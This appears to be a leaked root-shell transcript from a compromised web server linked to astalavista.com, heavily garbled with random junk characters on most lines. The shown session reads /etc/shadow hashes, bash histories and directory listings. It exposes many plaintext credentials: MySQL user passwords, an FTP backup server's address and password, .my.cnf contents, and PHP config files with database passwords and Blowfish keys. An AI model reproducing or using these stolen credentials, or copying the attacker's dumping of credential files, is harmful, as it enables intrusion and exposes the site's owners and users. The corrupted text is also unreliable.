2 D! T# ?9 g% l5 y' Q' Ujon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
4 e. {7 u# @/ P9 k2 w0 i1 o. Icom 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
* `/ `: q) C& e5 gastanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
* y8 Z/ C G: Q( T$ q" R0 X3 @2 G: n$ V, l# W: y
sh-3.2# cat /etc/motd* Q4 G: ~" @ K) x( X
#####################################################
' }0 S( S4 J# Y. ~0 u#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #) k. F, V& R& E
# |__| [__ | |__| | |__| | | | [__ | |__| #
# ~. f. y3 ]0 n0 B, k" U3 e# | | ___] | | | |___ | | \/ | ___] | | | #( q9 _, X3 [! c# c+ a
# #
- z4 j5 {; Z/ C# }1 p5 z: x- j; B9 I#####################################################
F/ K0 |( p& ~. b& W4 v$ E# #
5 O) Y5 J& Y! j/ `: R1 {- L5 Q' y" @# Admin Contact - 链接标记support@secureservertech.com #4 O/ P' G" w+ p. Y& f
# #
" h3 x0 A+ n5 Q# Available ShortCuts #
- G# ]1 I U8 {+ q4 h) n# #9 F+ c) F! n% J- D' S* s* S
# nst - list active connections #
p0 _) k- e5 S5 m( s# H! X5 e# ddos - shows how many times each ip is connected #8 j# z9 b4 h3 r( E0 a* T. c
# ltr - restart the webserver #
! o ~- t. O3 q# phpc - edit the php config file #
0 p2 M; M5 e; ]1 o, ~# htc - edit the webserver configuration file #
^( A" n0 @2 Q, L# up - uptime # o; z0 l7 ]7 @" {
# etd - edit the motd of the day file #2 }' s3 p. Y& E. [
# htr - start and restart apache if needed #
4 ^! X4 s( u2 P& V; T8 {# syng - shows active SYN_RECV connections #4 l6 f3 \1 L- o
# synd - syn flood blocker - “synd -h” for usage #
: Z/ u. O: H6 D6 L7 i- E2 S( s#####################################################
- V: r! s+ l* i/ J* P5 O: ]# NOTES: #
" O: T% ]7 f2 M# Last Upgrade - 12-08-2008 by JF #% R3 Z, U- V1 s E1 }1 s
# My.cnf/Mysql Optimization - 1-28-09 #2 l* g8 s5 S+ v: f- }4 x
# #) j' ^5 k- |; g% U
# #/ i' ?: v3 w" `) ~4 t
# #
- f+ h# P+ x, q9 P5 ^$ G, }5 _. Y#####################################################
) K$ r6 U! r& E2 Y& U. F0 ^
! L. V9 O8 B S( H' e1 V" g% y3 m# {sh-3.2# lastlog | grep -v Never
' i- u. @# I; @9 zUsername Port From Latest2 d- D7 j/ ` s4 ~
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009( O6 c$ S. |% F; d- I
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
9 [7 N$ c* r' ?! m, b, _$ Bcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009( r3 c: o. V4 o' c' L% Y% R, N: g
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
5 C1 d. P0 y8 H `0 l9 r$ l4 c' i5 O+ M- t
sh-3.2# ls -la H- b# B$ r$ x3 G7 u8 U) K
total 453376
: K. m" u4 a2 g" y+ k) c& f/ [) odrwxr-x— 15 root root 4096 Jun 4 08:40 .* x' n) B* ?% Y+ @, x4 g
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 i j. ?- J+ w7 F- N! d! Z-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
7 | B3 L0 P: y- Y; T-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
& y6 G7 N D/ ]0 E$ m/ {0 s& [-rw——- 1 root root 16836 Jun 4 07:21 .bash_history# m& n4 F7 L" f8 h: X6 j
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
2 s) a& @. M% F9 o* }-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile6 n ?7 b- a, z$ K" I
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc6 Z& X b0 Y# a R
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh7 O) V8 L. }, Y0 R: Q& S& g
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
\/ ?' G$ M- ^) Y! D/ B5 E* P0 T-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
6 `4 `+ Y: @ Q: [* i- |2 ydrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
7 ]8 |+ L9 p# p, f* O& E7 y3 ]-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc! r% h4 r; o9 [- _) H
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
% w5 @7 K6 w* D @2 R2 I& mdrwx—— 2 root root 4096 Oct 28 2007 .elinks5 B; }" ~# H- T: y
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1+ [& k' ~+ ~+ |" t3 ], X7 [; D
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz22 l0 \9 \" a7 P; s, y
-rw——- 1 root root 0 Apr 16 13:19 .history( x5 N" @+ W d+ ^6 X* M/ D) {( u& i
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log. {. G! p4 [7 C4 M6 b
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
# c+ S7 X$ ?+ {' O-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
. o! P5 |' S9 d' O2 V/ \. B3 e-rw——- 1 root root 35 Jun 2 14:23 .lesshst- a' M3 y1 d. d0 R* c* k
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp2 M% c. f' q6 g# {/ G
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec9 t7 q9 k7 B1 s! d' x1 e
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
2 j. S- o8 X! t. c-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
( z9 F6 z1 T+ V- ]! n; c4 c-rwx—— 1 root root 760 Sep 18 2008 lp4 M- S1 G2 r7 q* V: N( R8 m
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1: X6 ~" M _4 i3 x" j6 w) I; s( P
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz: s! ~: W5 @) U m
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
$ T! T! G3 [7 t# a, {drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
7 i! r4 e2 K6 L9 s L: l- H-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
2 d! W; r* N- y( jdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.36 D) r/ s( @- R/ S
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz w( l ~* z8 w* p
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh# A/ E3 ^0 e% W# X! m( E
-rw——- 1 root root 41 Oct 19 2007 .my.cnf2 b+ h- m/ V" K" g7 a
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history" `' j8 m( B- ]- K2 q" L; s
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport% {) r; m# k$ ] Q
-rw——- 1 root root 41 May 20 2008 .mytop
F$ j) P/ z* g2 Q, P! bdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6( K6 ]- z, p+ K6 ~" P) s4 C
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
: X& g) Q: z8 {- |drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp8 m: c2 [4 u5 c
-rw——- 1 root root 1462 Sep 21 2007 opt.php+ ? T) N) w3 r0 v4 M$ u
-rw-r–r– 1 root root 3371 Sep 22 2007 p5 N# t$ u$ s5 ` R4 t# T+ R
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2& t. |: v# `, n+ R5 j
-rw——- 1 root root 1024 Feb 3 21:32 .rnd& }" r7 D) [, R& C4 y
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr% c$ q* F; n! W5 ?; F5 T3 y0 O
-rw-r–r– 1 root root 887 Nov 28 2007 server.key. T' f" H3 j$ R, i
drwx—— 2 root root 4096 Oct 10 2008 .ssh" Q: H7 M$ @' ~. B J" D
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat3 }' I0 R0 r/ S- @) {; L7 Z7 V
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc8 S& M7 A! R$ \* w
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
7 n+ _+ ` U- u) k-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.15 z( ~' `5 Q: |/ N8 A
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp; q: \% m% ?7 l- u m0 H+ l
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
5 s+ E9 a0 C0 U8 _- P# Z& q9 edrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
; e g) l* O: B( x4 r2 ^-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
! M6 |. W/ `; g! S# }-rw——- 1 root root 12997 May 16 2008 .viminfo6 E5 j+ j" U7 O' i' ], t
' l- o5 E- S+ a- R
sh-3.2# cat .bash_history/ k" N8 |9 s: B1 y6 h
[snip]8 M- I, F2 T; h/ T! k
wget cp4sst.com/sstlinux.tar.gz& _2 T: E! q1 f6 }# s
tar zxvf sstlinux.tar.gz2 w1 y) Y6 i" c. _' s. \0 v
cd linux-2.6.27.106 H( z1 Y" c2 p% H
sh install.sh
, V6 l9 g6 V- nmake bzImage ; make modules ; make modules_install ; make install5 O5 b3 b6 ?7 E
make clean, [! v1 ~' l' I! ` C
service mysqld restart; l3 ]" _5 {/ u/ c4 I, ~4 M
[snip]
, |6 K- j; i/ D7 Q. Ecd /usr/sbin/; m% e; l/ e4 D2 M" L
chmod 4777 traceroute0 [6 C$ Q3 [8 a2 j/ u" q8 q; F
chmod 4777 ping) V' @: v6 r2 `
traceroute -I 链接标记[url]www.astalavista.ch[/url]
$ C) a% n; q1 ~- j4 Q% c# S[snip]/ f3 o; y4 N! x" ?. f) Y% S
vi /etc/csf/csf.conf8 @/ z7 r( U. [* ]* w1 R
traceroute google.ch
+ I0 `2 x3 v( P1 t; L. wservice csf restart. X, }1 Q* U( t/ s w$ K# k1 j2 P- \
tracert google.ch0 [3 Z) `2 X+ L7 U
service csf restart- R' d; g6 @0 u1 D; }& @
traceroute 链接标记[url]www.google.ch[/url]
8 m7 R3 x" B& U9 u8 G) o% g4 ^tracert 链接标记[url]www.google.ch[/url]; f1 v7 G2 `: ?: A$ e* S3 n0 o @
traceroute 链接标记[url]www.google.ch[/url]5 a( c6 X& F2 A. t
locate traceroute) `4 p% g( X8 K& s6 D% d. z) U; o: j
chown 4755 /bin/traceroute
W) D% t: r" j8 Ichown 4777 /bin/traceroute1 M$ C' D1 h6 _
locate ping
: o8 ^; @* E& M. {9 b; ?2 a) q) cchown 4755 /bin/ping
7 c- K1 }% B2 u2 kchown 4777 /bin/ping
; W* B( l a; p3 w# T2 v) `. i# m4 ]cd /bin/
7 ?* }6 N$ u6 }# z$ a! t5 c/ zls -ali | grep ping/ F. ]- k/ N( {8 B* q. M
chown root ping) N: f$ @& j- `: l" K! Q
chmod 4755 ping
$ c5 A3 W3 q L9 Mls -ali | grep traceroute+ Y: T c0 ]* z Y2 l* q) ^
chown root traceroute. r8 g: e& S$ I% _3 t* [) r" m
chmod 4755 traceroute1 \( z3 Y+ w, y* }
ls -ali | grep traceroute v1 e: i; t/ l! x; ?3 h- j# }
traceroute -I 链接标记[url]www.google.ch[/url]1 T3 t. M D/ R' G5 Z& \
traceroute 链接标记[url]www.google.ch[/url]
- A" @7 y' s- \- r7 X% n. {whois pmsantos.ch M, a4 f5 P5 @) U, U4 M1 J, @
[snip]) E+ a; t3 |/ v; \2 b
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
! K1 w0 V7 g' v1 W3 R: |; q9 vmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql: U+ e. ?* `' \
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql( I6 U- v+ b) Z Q/ Y& l+ J: t& E
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql' Q. E' `: h) Y9 m c
top7 l1 I' u: }2 ^5 W4 Y
ping ssth.ch T* Q" |# Z; I0 P* T; a8 m& ?
ping asdlkfaljgasd???ljg???lasj.ch
' y8 `/ M" s; yping asdlkfaljgasdlasj.ch- u2 I1 ?! K; d! t
ping 链接标记[url]www.ssth.ch[/url]
+ g; `; ~5 E3 G( b8 }$ [ zping ssth.ch/ u+ W# y) F+ n2 w- ^ Z
nslookup 链接标记[url]www.google.ch[/url]7 l" ] c1 h. Q+ V' Z4 U
nslookup 链接标记[url]www.ssth.ch[/url]$ w2 Y2 \4 q6 v4 b0 w; h- {
man nslookup9 z8 C8 ~2 O% b: r6 g, U0 T
ping 链接标记[url]www.google.ch[/url]
* K" v: r' ]0 [7 h0 e* u, {nslookup 链接标记[url]www.google.ch[/url]2 i6 N# t6 o7 l1 \' s
nslookup 链接标记[url]www.google.ch[/url]
0 }% K/ [, V: T; nnslookup salfjasdlf.ch7 z* }0 A ?( v8 P
[snip]0 S& l( @, o! ?/ Y$ h
openssl passwd -1 sadf# ]5 T3 `1 x9 m. u# J) A$ F
openssl passwd -1 5cZNHstdTy
: M+ ^0 v3 A. Tmysql: T) g6 A. l9 H1 J
mysql
9 T. B+ P, x7 q- n7 {locate proftp
! ?( ?7 D) q( n- O# w* W6 T( \vi /etc/proftpd.passwd
+ g. w; B: A6 D( aservice proftpd restart3 s7 V+ p0 q& n& G
locate proftpd.conf
9 \2 v' {- O1 b- F8 R/ Evi /etc/proftpd.conf
5 v# n5 u2 N9 p0 g% v; Yvi /etc/proftpd.passwd
! }; O f& D3 W. J3 Q9 [0 vservice proftpd restart
. f$ J( ^6 Q% d5 H9 J( {7 Y[snip]
$ n2 v4 ~- N: J+ y/bin/sh /home/com/backup_system/backup.sh( t# {" X+ e3 M6 _
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin8 a5 b0 u0 p K9 @8 l
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
. U- H# C# ^" tmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
( r/ ]7 k, x$ K1 k( els -ali8 K8 ?' A) @3 [5 \
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
D1 {6 z+ `; s' |" dmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql' \ Z; |/ o0 Q/ `3 U
crontab -l
( b! f% d- P( m5 Jcrontab -l& T6 C( g/ ^" F I7 Q0 x5 D( k
php -q /home/com/public_html/modifications/cronjobs/securitynews.php1 g- p" q& R1 E' @! v3 E
/home/com/public_html/modifications/cronjobs/exploits.sh7 H! L! K' F. a8 r: K4 @: z- A
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
W7 t/ l8 }6 O) Atar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
. E6 h E# O$ e1 }/ h3 \% N/ Bcd lsws-4.0.30 ~' ], C! s" A2 `' ^: J# V+ ^' ?
sh install.sh
0 d: h' B- T0 u9 ], suptime7 g5 \3 @1 C# N. k. P4 q6 W
hdparm -tt /dev/sda
0 k/ T# [" G# o: O* b9 Y- iiostat4 B$ C8 a3 S0 O7 R! K! K4 j
yum install iostat
) X6 J. L# V6 Miostat
. d+ Z$ r* ]+ z* vwhereis iostat/ r- f$ l3 [4 q; G4 D8 X) k2 C1 r
yjm clean all o6 }! b/ q# a( F, @# T
yum clean all ; yum -y update
2 ]8 `- [& S" w3 ^4 E' o; tiostat; V6 h" K( s! _- @/ }! N
yum install systat3 l. w! e6 p) e
rpm -qa | grep iostat$ D s. d, w1 W, C# V% L: X
rpm -qa | grep sysstat9 {. |5 d9 I6 S) o8 R
rpm -qa | grep systat2 M+ C3 K7 b# [6 W% [" B: D
dmesg -c
' S- Z# I! ?' O2 r0 k( y! B8 {sysctl -p# Q% e! u* E4 p# {* g
uname -r8 x4 ?/ ^; l* A
cd /usr/src; y1 y9 d* c( ]7 O, E
wget nix101.com/kernels/sstlinux.tar.gz
' K, |: F0 x/ p) f6 kshutdown -r now' N! e* v2 K4 g) U2 C8 `
nano -w /boot/grub/grub.conf
4 h! [. S/ |$ F7 P* g( I4 J
: @2 U1 K4 g3 d) o) ?sh-3.2# cat .my.cnf
' J6 y; D$ Q3 ]( r# R3 g[client]; w% k1 y; R; h! S$ q
user=da_admin4 x2 ?8 \: O' |( K6 e0 x: ^
password=X9dctmRH
& F5 f, I" |6 m+ `- t# w/ A% J8 M* d& E; t4 e% z
sh-3.2# cat /home/com/backup_system/backup.sh
* C( D" V0 Z3 u" f#!/bin/sh
' Q' J s2 \: q$ }0 o#####################################################################
! [& n3 J8 b& }0 Y( y" q" L4 K# #
% [3 [+ ^+ E3 Z9 u% n1 z# incremental backup for astalavista.com #/ Z# x$ r) {. B j; C
# #
- h1 E C& s8 E# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #& r4 ]- ^4 h6 [5 b
# #- ]0 d& x; I2 F
#####################################################################, P$ N' ^2 U" G$ N. j% S% X3 l# ~% @
[snip]
' y0 ^/ V- R4 r& |0 QPROG_DIR=”/home/com/backup_system”;' z2 P2 Z+ H) m- ?" Z
BACKUP_DIR=”/home/com/backups”;
3 K# K' m2 T+ ~0 DDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
3 v% \% w/ i; }2 Y# ftp for synology backup server( X, }4 Y9 d5 `
FTP_HOST=”212.254.194.163″;; D$ C4 o9 T8 S* X
FTP_PORT=”21″;5 l% T7 X+ p! M" {2 I
FTP_USER=”astalavista.com”;
$ q& l8 W! ~2 U8 [) rFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
9 ^0 o1 W3 ^) z$ j$ hFTP_DIR=”/astalavista.com”;/ m: K1 L/ @% i( ~! J
# database. Y u0 b- s8 q
DB_HOST=”localhost”;
; c' V% C& T1 `! v4 u0 HDB_USER=”contrexxuser2″;5 |' F! { ~* r/ V/ a
DB_PASS=”0fEYNZgXz1pKe”;" w% U, b" l: e; T* m' g
DB_DATABASE1=”com_contrexx2_live”;
6 h( |, v4 w: s) C7 Q( w( x. f tDB_DATABASE2=”com_contrexx2″;9 f/ S; U$ b+ R7 f) S; S
[snip]
3 p1 D6 i R; P3 z$ @ _) o+ Yftp -in $FTP_HOST $FTP_PORT <<EOF
* C& X7 _4 i+ `9 _' Y- ^; _quote USER $FTP_USER- m& G. d/ w. V9 I; A
quote PASS $FTP_PASS
$ q h: z* m: A r N$ Vcd $FTP_DIR% u& p" H7 P6 y9 c2 i2 x9 U
put $DB_FULLNAME-SQL_Dump.tar. @$ Z: _( J' l, L* g/ z
put $BACKUP_FULLNAME-Public_HTML.tar
* M9 Q+ Q' G' F, W# m" Tclose
0 b9 l% ^* \6 Lbye
" t& c' x) `3 _/ w. M3 jEOF
& `4 s2 d1 @# ^( \6 Y
% P, Y c- S3 [4 A& lsh-3.2# cd /home
. A8 r4 }7 N: V. Dsh-3.2# ls -la
7 Q% h8 C/ W+ F Z- {7 T5 Atotal 1208 P6 p2 m( s9 Z- W0 ~$ y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .3 A j5 T+ A) \1 |" z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
" {' ~ {$ ^* }' [drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
8 L. `' T; C& ?8 N$ {7 z-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
# p9 s8 a+ }8 a+ F9 {8 s# O, W; i-rw——- 1 root root 8192 Jun 3 02:45 aquota.user6 A, b7 g* E2 `5 V7 v1 {) s- i
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
9 Z9 ~# E& r1 N7 w" qdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup p7 ]3 c u8 t' E/ `+ z+ w" C$ s/ Y: A
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
* }) o5 C T S% P% L* m hdrwx–x–x 10 com com 4096 Apr 28 12:40 com: D' e+ w! ~$ {0 |* W3 U& i0 g7 e
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
# _5 w0 ^! f( c1 W# ~drwx—— 3 jon jon 4096 Sep 21 2007 jon
! A! Q2 g' V$ V; Qdrwx—— 2 root root 16384 Sep 11 2007 lost+found. A" x8 F& z& l
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 {3 s9 v1 F( I5 L) S" odrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata/ X. a$ F; T. s4 b- ]) e! J
drwx—— 2 jon jon 4096 Sep 15 2007 test8 a9 x$ j5 K2 A% i. f+ J
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
5 W. ~3 s( m! u2 @7 h2 c( m, ~; d% x Y. @4 l$ K
sh-3.2# cd admin
' N( K! i5 J# }- b. L" Jsh-3.2# ls -la6 b, a2 ^- B) K& R4 r5 x" L
total 1735896
. _$ }+ H9 j: _" ~4 \( qdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
% N$ a0 Z1 v4 Pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- o' M& [3 c0 S3 |; W$ }+ Z! kdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
& ?3 K! h! r) [/ V* ~8 Rdrwx—— 2 admin admin 4096 Sep 28 2007 backups7 r9 R4 a W' T
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
9 Z6 N U2 F9 F4 W6 f6 p; z& _) \-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout- U. ?+ a& G3 f! a, Z8 ~5 F3 T
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile* k$ p- i# s! N% Z" c
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
+ Y5 n1 e2 H- g; t: ^drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
$ D4 u4 ~3 { y" j: |; l; y, [drwx–x–x 6 admin admin 4096 Sep 21 2007 domains s; v0 h, p$ R# x) X! T- x
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap J% J; z3 {* W9 \
-rw-r–r– 1 root root 24 Sep 21 2007 info.php" f$ {6 X% i' h4 F; d( E1 K& q
drwx—— 2 admin admin 4096 Sep 21 2007 mail
$ [* O/ N; Y/ S: K5 q" Z% P g% r9 m, T( l-rw-r–r– 1 root root 716 Nov 28 2007 server.csr. d# S6 i3 O1 g, l2 z3 D
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
: |% F7 \, J, p; i8 @# h2 v4 o-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow9 d; T6 Z. |8 q5 p
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz. [- `9 u D7 ]* e
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
8 b' F7 d- q3 ~! m4 ?, i/ U2 x" q% J; F1 ~
sh-3.2# ..
. f+ B! N W/ zsh-3.2# cd jon2 J5 {% s$ L$ j" b3 n% P
sh-3.2# ls -la
1 P0 F/ k- O0 L) q) C7 gtotal 362 {6 `0 ^& W, B) b! N1 G) b& j: c
drwx—— 3 jon jon 4096 Sep 21 2007 .
" K* v# s. X/ t& idrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: r, ?. O B: N3 e" J) R) X& I$ P-rw——- 1 jon jon 53 Sep 21 2007 .bash_history6 h- E) J7 T1 A% K4 o
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
5 U$ W8 R1 x% Y6 v-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile4 J8 g/ O4 e( P% ^
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc4 l" r. D9 F1 A% I
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
* F' F* S; m( h+ _drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
, y, c8 O, f& ^, P, W# I: i; D/ u% F" V; m) p9 s1 e7 ~2 B$ i% C7 M/ b& F
sh-3.2# cd ..
- N* U9 R7 c0 M; o1 G lsh-3.2# cd test
& l( w+ }* w0 b6 S# osh-3.2# ls -la/ c/ ]1 f) M4 @
total 48
+ O/ r- P5 v* @0 v ldrwx—— 2 jon jon 4096 Sep 15 2007 .
- X0 B* V- {$ u# ?/ Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 B3 p6 j) f7 V% I- `) y-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
% e% P0 y6 v2 _ R3 _* l3 a-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout8 c L3 Q! n2 }, K8 K4 x& |
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
" b2 R& P7 C% z- Z) E-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc0 I: i$ x0 G; ?9 ~( C$ c- o5 M
sh-3.2# cat .bash_history
' O2 L% k7 \/ |) D; l A/ Y/usr/bin/mysqladmin -u root password PoliuJhytg67
4 a& n. T0 E5 J! w' \* q' Q3 m* ~+ M5 d) z
sh-3.2# cd ..; }' `- _5 }* T6 _6 `/ W, P4 f
sh-3.2# cd astanet
7 H8 U m A& r5 E. i9 Dsh-3.2# ls -la$ r! W4 P1 i6 z* A: c
total 52$ K# R1 L: S# F6 k* K5 X7 V( [
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .6 i( n* a) F7 O' M$ a3 a
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! B/ \% @: K% J6 {2 b4 P0 A
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth$ E3 i$ T, m4 N0 r! T; Z4 X. I. N
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history! l. p# E, E. y; [7 `
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
# ]8 o/ M9 Q$ P, S-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
& W# h- C) n1 o& d8 A( S; P-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc) G% }8 w9 _5 j# y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains' E6 ~3 {* J) O
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
# t/ O* w. t/ C P$ Edrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
h! o; F+ S! o. U. U-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
- k. Z& {+ y2 T, tlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
# Y* L- Q4 `! \3 u. n7 `-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow9 E* ^7 y* d. e* ?/ y4 y# w
/ S6 f6 j! a9 b- C& `+ p+ H7 J
sh-3.2# cd auth/
' z" o- g1 _7 N- Lsh-3.2# ls -la7 N4 N V. V5 ?& D
total 28
( G$ S" r& a! Q7 ddrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
0 J) R9 H# F: }5 u5 }9 _drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..& y3 d, h0 Q6 |9 |# [2 L
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
3 h! y% ?% h! u: x$ {& T# K7 I-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
; {2 @6 {, W* V-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd- z2 w4 Y- L' P1 n
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
1 }8 }7 f9 Q4 _" v! {-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd( \& y$ V( t5 x/ E
3 w! a( L% i" j8 y8 @4 Ksh-3.2# cat hackercontest.config.inc.php
7 j- z) @7 \3 |5 `9 O# ~<?PHP# S: o) M& a8 l8 c" b
// Variabeln f?r Verbindung zur Datenbank //
; e5 [4 o" L6 u; z* G9 G$conxHost = ‘localhost’; // MySQL hostname
, V9 }& s/ p& S$ r) j" n% j$conxUser = ‘hackercontest’; // MySQL user
$ } _) h' m1 q3 G% ^( Q( p$conxPassword = ‘K6m@7dUc’; // MySQL password. `% \( u4 h* s
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
1 i5 m. O4 J5 K; T5 Q?>
+ N' W2 y! W" C1 c9 H" w5 Bsh-3.2# cat hosting.config.inc.php: Y5 L! G1 _+ ~8 ^. D
<?PHP5 [! \; U) o% l/ `, Y7 v5 H
// Variabeln f?r Verbindung zur Datenbank //
. D" M: b6 v9 {+ b0 H$conxHost = ‘localhost’; // MySQL hostname
8 a, ^5 B# |9 R- y: i( N. b$conxUser = ‘hostinguser’; // MySQL user2 r X( Z V5 t
$conxPassword = ‘cXvB3981′; // MySQL password; X; D7 ^) ~- p+ B
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
- X1 s" W! c* j; R?>
